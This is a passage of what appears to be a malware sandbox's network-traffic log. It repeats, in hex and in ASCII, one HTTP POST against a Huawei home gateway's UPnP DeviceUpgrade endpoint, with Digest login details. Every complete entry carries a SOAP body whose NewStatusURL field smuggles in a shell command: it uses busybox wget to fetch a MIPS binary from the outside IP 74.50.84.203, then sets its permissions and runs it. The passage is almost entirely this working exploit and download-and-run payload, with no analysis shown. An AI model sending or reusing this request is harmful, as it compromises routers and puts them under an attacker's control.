chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POSTData Raw: Data Ascii:
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 